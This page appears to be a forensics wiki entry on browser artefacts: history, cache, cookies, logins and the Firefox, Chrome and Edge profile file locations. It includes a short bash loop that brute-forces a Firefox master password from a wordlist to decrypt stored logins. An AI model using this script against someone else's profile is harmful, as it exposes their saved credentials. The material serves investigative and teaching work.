Artifacts
Browsers Artefacts
When we talk about browser artefacts we talk about, navigation history, bookmarks, list of downloaded files, cache data…etc.
These artefacts are files stored inside of specific folders in the operating system.
Each browser stores its files in a different place than other browsers and they all have different names, but they all store (most of the time) the same type of data (artefacts).
Let us take a look at the most common artefacts stored by browsers.
- Navigation History : Contains data about the navigation history of the user. Can be used to track down if the user has visited some malicious sites for example
- Autocomplete Data : This is the data that the browser suggest based on what you search the most. Can be used in tandem with the navigation history to get more insight.
- Bookmarks : Self Explanatory.
- Extensions and Addons : Self Explanatory.
- Cache : When navigating websites, the browser creates all sorts of cache data (images, javascript files…etc) for many reasons. For example to speed loading time of websites. These cache files can be a great source of data during a forensic investigation.
- Logins : Self Explanatory.
- Favicons : They are the little icons found in tabs, urls, bookmarks and the such. They can be used as another source to get more information about the website or places the user visited.
- Browser Sessions : Self Explanatory.
- **Downloads :**Self Explanatory.
- Form Data : Anything typed inside forms is often times stored by the browser, so the next time the user enters something inside of a form the browser can suggest previously entered data.
- Thumbnails : Self Explanatory.
Firefox
Firefox use to create the profiles folder in ~/.mozilla/firefox/ (Linux) ***or in _**C:\Users\XXX\AppData\Roaming\Mozilla\Firefox\Profiles*_ (Windows)_**.**_
Inside this folder, the file _**profiles.ini**_ should appear with the name(s) of the used profile(s).
Each profile has a “**Path**” variable with the name of the folder where it’s data is going to be stored. The folder should be **present in the same directory where the** _**profiles.ini**_ **exist**. If it isn’t, then, probably it was deleted.
Inside the folder of each profile (~/.mozilla/firefox/<ProfileName>/) path you should be able to find the following interesting files:
- places.sqlite : History (moz_places) and bookmarks (moz_bookmarks)
- bookmarkbackups/ : Bookmarks backups
- formhistory.sqlite : Web form data (like emails)
- handlers.json : Protocol handlers (like, which app is going to handle mailto:// protocol)
- persdict.dat : Words added to the dictionary
- addons.json and extensions.sqlite : Installed addons and extensions
- cookies.sqlite : Contains cookies
- cache2/entries or startupCache : Cache data
- favicons.sqlite : Favicons
- prefs.js : Settings and Preferences
- downloads.sqlite : Downloads
- thumbnails/ : Thumbnails
- logins.json : Encrypted usernames and passwords
- key4.db or key3.db : Master key ?
In order to try to decrypt the master password you can use https://github.com/unode/firefox_decrypt
With the following script and call you can specify a password file to bruteforce:
{% code title=“brute.sh” %}
#!/bin/bash
#./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
passfile=$1
while read pass; do
echo "Trying $pass"
echo "$pass" | python firefox_decrypt.py
done < $passfile
{% endcode %}
Google Chrome
Google Chrome creates the profile inside the home of the user ~/.config/google-chrome/ (Linux) or in **C:\Users\XXX\AppData\Local\Google\Chrome\User Data** (Windows).
Most of the information will be saved inside the Default/ or ChromeDefaultData/ folders inside the paths indicated before. Inside here you can find the following interesting files:
- History : URLs, downloads and even searched keywords
- Cookies : Cookies
- Cache : Cache
- Bookmarks : **** Bookmarks
- Web Data : Form History
- Favicons : Favicons
- Login Data : Login information (usernames, passwords…)
- Current Session and Current Tabs : Current session data and current tabs
- Last Session and Last Tabs : Old session and tabs
- Extensions/ : Extensions and addons folder
- Thumbnails : Thumbnails
Microsoft Edge
- Profile Path: C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC
- History, Cookies and Downloads: C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
- Settings, Bookmarks, and Reading List: C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb
- Cache: C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache
- Last active sessions: C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active